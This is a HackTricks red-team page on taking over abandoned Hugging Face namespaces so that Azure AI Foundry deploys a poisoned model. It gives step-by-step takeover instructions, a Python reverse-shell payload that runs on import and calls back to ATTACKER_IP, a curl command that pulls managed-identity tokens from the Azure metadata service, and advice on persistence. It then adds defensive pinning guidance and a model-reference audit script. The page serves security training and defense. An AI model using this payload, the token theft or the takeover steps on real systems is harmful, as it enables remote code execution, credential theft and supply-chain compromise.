Azure - AI Foundry Post-Exploitation via Hugging Face Model Namespace Reuse


tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Scenario

  • Azure AI Foundry Model Catalog includes many Hugging Face (HF) models for one-click deployment.
  • HF model identifiers are Author/ModelName. If an HF author/org is deleted, anyone can re-register that author and publish a model with the same ModelName at the legacy path.
  • Pipelines and catalogs that pull by name only (no commit pinning/integrity) will resolve to attacker-controlled repos. When Azure deploys the model, loader code can execute in the endpoint environment, granting RCE with that endpoint’s permissions.

Common HF takeover cases:

  • Ownership deletion: Old path 404 until takeover.
  • Ownership transfer: Old path 307 to the new author while old author exists. If the old author is later deleted and re-registered, the redirect breaks and the attacker’s repo serves at the legacy path.

Identifying Reusable Namespaces (HF)

```bash
# Check author/org existence
curl -I https://huggingface.co/<Author>        # 200 exists, 404 deleted/available

# Check model path
curl -I https://huggingface.co/<Author>/<ModelName>
# 307 -> redirect (transfer case), 404 -> deleted until takeover
```

End-to-end Attack Flow against Azure AI Foundry

  1. In the Model Catalog, find HF models whose original authors were deleted or transferred (old author removed) on HF.
  2. Re-register the abandoned author on HF and recreate the ModelName.
  3. Publish a malicious repo with loader code that executes on import or requires trust_remote_code=True.
  4. Deploy the legacy Author/ModelName from Azure AI Foundry. The platform pulls the attacker repo; loader executes inside the Azure endpoint container/VM, yielding RCE with endpoint permissions.

Example payload fragment executed on import (for demonstration only):

```python
# __init__.py or a module imported by the model loader
import os, socket, subprocess, threading

def _rs(host, port):
    s = socket.socket(); s.connect((host, port))
    for fd in (0,1,2):
        try:
            os.dup2(s.fileno(), fd)
        except Exception:
            pass
    subprocess.call(["/bin/sh","-i"])  # or powershell on Windows images

if os.environ.get("AZUREML_ENDPOINT","1") == "1":
    threading.Thread(target=_rs, args=("ATTACKER_IP", 4444), daemon=True).start()
```

Notes

  • AI Foundry deployments that integrate HF typically clone and import repo modules referenced by the model’s config (e.g., auto_map), which can trigger code execution. Some paths require trust_remote_code=True.
  • Access usually matches the endpoint’s managed identity/service principal permissions. Treat it as an initial access foothold for data access and lateral movement within Azure.

Post-Exploitation Tips (Azure Endpoint)

  • Enumerate environment variables and MSI endpoints for tokens:

```bash
# Azure Instance Metadata Service (inside Azure compute)
curl -H "Metadata: true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
```

  • Check mounted storage, model artifacts, and reachable Azure services with the acquired token.
  • Consider persistence by leaving poisoned model artifacts if the platform re-pulls from HF.

Defensive Guidance for Azure AI Foundry Users

  • Pin models by commit when loading from HF:

```python
from transformers import AutoModel
m = AutoModel.from_pretrained("Author/ModelName", revision="<COMMIT_HASH>")
```
  • Mirror vetted HF models to a trusted internal registry and deploy from there.
  • Continuously scan codebases and defaults/docstrings/notebooks for hard-coded Author/ModelName that are deleted/transferred; update or pin.
  • Validate author existence and model provenance prior to deployment.
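The scan-and-pin guidance above, together with the HTTP heuristics from "Identifying Reusable Namespaces", as an added defender-side example (not HackTricks code): it finds `from_pretrained("Author/ModelName")` calls in source text, checks whether each is pinned to a full commit hash, and classifies the namespace from the author/model HTTP status codes. The status lookup is injected as a callable and the sample source and status table are constructed, so it runs offline; a real run would supply a function that issues HEAD requests to `https://huggingface.co/<path>`.

```python
"""Audit source files for unpinned Hugging Face model references and classify
the state of each namespace (deleted author, transferred model, present)."""
import re
from typing import Callable, Dict, List

# from_pretrained("Author/ModelName", ...) -> captures the id and the remaining args
_CALL_RE = re.compile(r'from_pretrained\(\s*["\']([\w.-]+/[\w.-]+)["\']([^)]*)\)', re.S)
_REV_RE = re.compile(r'revision\s*=\s*["\']([^"\']+)["\']')
_SHA_RE = re.compile(r'^[0-9a-f]{40}$')  # only a full commit hash counts as pinned

def classify(author_status: int, model_status: int) -> str:
    """Map HTTP status codes for the author page and model path to a risk label."""
    if author_status == 404:
        return "reusable-namespace"   # author deleted: the name can be re-registered
    if model_status == 307:
        return "transferred"          # redirect that breaks if the old author is deleted
    if author_status == 200 and model_status == 200:
        return "present"
    return "unknown"

def audit(source: str, status_of: Callable[[str], int]) -> List[Dict]:
    """One finding per from_pretrained() call. status_of(path) returns the HTTP
    status for https://huggingface.co/<path>; it is injected so tests run offline."""
    findings = []
    for m in _CALL_RE.finditer(source):
        model_id, rest = m.group(1), m.group(2)
        author = model_id.split("/")[0]
        rev = _REV_RE.search(rest)
        pinned = bool(rev and _SHA_RE.match(rev.group(1)))  # "main" etc. is not a pin
        state = classify(status_of(author), status_of(model_id))
        action = "ok" if pinned and state == "present" else "pin-or-mirror"
        findings.append({"model": model_id, "pinned": pinned,
                         "state": state, "action": action})
    return findings

# Constructed sample: a pinned healthy reference, an unpinned reference whose
# author was deleted on HF, and a reference pinned only to a branch name.
SAMPLE_SOURCE = '''
from transformers import AutoModel
a = AutoModel.from_pretrained("goodorg/stable-model", revision="0123456789abcdef0123456789abcdef01234567")
b = AutoModel.from_pretrained("deletedorg/legacy-model", trust_remote_code=True)
c = AutoModel.from_pretrained("oldorg/moved-model", revision="main")
'''
SAMPLE_STATUS = {"goodorg": 200, "goodorg/stable-model": 200,
                 "deletedorg": 404, "deletedorg/legacy-model": 404,
                 "oldorg": 200, "oldorg/moved-model": 307}

def demo() -> List[Dict]:
    """Run the audit over the constructed sample with the constructed status table."""
    return audit(SAMPLE_SOURCE, lambda path: SAMPLE_STATUS.get(path, 404))
```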

Recognition Heuristics (HTTP)

  • Deleted author: author page 404; legacy model path 404 until takeover.
  • Transferred model: legacy path 307 to new author while old author exists; if old author later deleted and re-registered, legacy path serves attacker content.

```bash
curl -I https://huggingface.co/<OldAuthor>/<ModelName> | egrep "^HTTP|^location"
```

Cross-References

  • See broader methodology and supply-chain notes:

Pentesting Cloud Methodology
